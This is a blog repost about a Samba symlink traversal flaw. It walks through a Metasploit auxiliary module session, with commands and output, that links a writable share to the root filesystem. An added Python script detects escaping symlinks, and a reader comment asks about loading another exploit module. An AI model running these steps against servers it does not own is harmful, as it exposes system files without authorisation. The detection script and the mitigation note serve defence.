Exploiting the Samba Symlink Traversal

Last night, a video uploaded to YouTube demonstrated a logic flaw in the Samba CIFS service. It was soon followed by a mailing list post. This bug allows any user with write access to a file share to create a symbolic link to the root filesystem, which allows access to any file on the system with the current user’s privileges. This bug affects any Samba service that allows anonymous write access; however, read access to the filesystem is still limited by normal user-level privileges. In most cases, anonymous users are limited to the ‘nobody’ account, thus limiting the damage possible through this exploit.

A Metasploit auxiliary module has been added to verify and test this vulnerability. Update to SVN revision 8369 or newer and start up the Metasploit Console:

$ msfconsole
msf > use auxiliary/admin/smb/samba_symlink_traversal

msf auxiliary(samba_symlink_traversal) > set RHOST

msf auxiliary(samba_symlink_traversal) > set SMBSHARE shared

msf auxiliary(samba_symlink_traversal) > set SMBTARGET rooted

msf auxiliary(samba_symlink_traversal) > run

[*] Connecting to the server…
[*] Trying to mount writeable share ‘shared’…
[*] Trying to link ‘rooted’ to the root filesystem…
[*] Now access the following share to browse the root filesystem:
[*] \

Keep in mind that non-anonymous shares can be used as well; just set SMBUser and SMBPass to valid user account credentials.
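For administrators checking their own servers, the following added example (not part of the original post or of Metasploit) walks a share's directory on the Samba host and reports every symbolic link that resolves outside the share root, which is the artifact this bug leaves behind. The function names are hypothetical, and the sample share is constructed in a temporary directory, reusing the `shared` and `rooted` names from the session above.

```python
import os
import tempfile

def find_escaping_symlinks(share_root):
    """Return sorted (link_path, resolved_target) pairs for every symlink
    under share_root whose target resolves outside share_root."""
    root = os.path.realpath(share_root)
    findings = []
    # followlinks=False: list links to directories but never descend through them
    for dirpath, dirnames, filenames in os.walk(root, followlinks=False):
        for name in dirnames + filenames:
            path = os.path.join(dirpath, name)
            if not os.path.islink(path):
                continue
            target = os.path.realpath(path)  # resolves relative and chained links
            # The common prefix equals the share root only if the target is inside it
            if os.path.commonpath([root, target]) != root:
                findings.append((path, target))
    return sorted(findings)

def build_sample_share(base):
    """Constructed sample data: a share with one harmless internal link,
    one absolute link to '/', and one relative link climbing out of the share."""
    share = os.path.join(base, "shared")
    os.makedirs(os.path.join(share, "docs"))
    with open(os.path.join(share, "docs", "readme.txt"), "w") as fh:
        fh.write("constructed sample file\n")
    os.symlink(os.path.join(share, "docs"), os.path.join(share, "docs_link"))  # stays inside
    os.symlink("/", os.path.join(share, "rooted"))           # escapes to the root filesystem
    os.symlink("../../", os.path.join(share, "docs", "up"))  # relative escape
    return share

if __name__ == "__main__":
    with tempfile.TemporaryDirectory() as tmp:
        for link, target in find_escaping_symlinks(build_sample_share(tmp)):
            print(f"{link} -> {target}")
```

Run it against the directory named by a share's `path` setting in smb.conf. Samba's `wide links = no` setting stops smbd from following links that point outside the share.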

Source: Metasploit Blog

1 comment to Exploiting the Samba Symlink Traversal

  • Dear Sir, I just tried to use ms06_067_keyframe from Metasploit. I am using BackTrack 5 R2. I located the exploit in /opt/metasploit/msf3/modules/exploits/windows/browser, but when I try to use it, it shows a "failed to load module" error. What can I do to solve the problem? Regards, Prasannaa
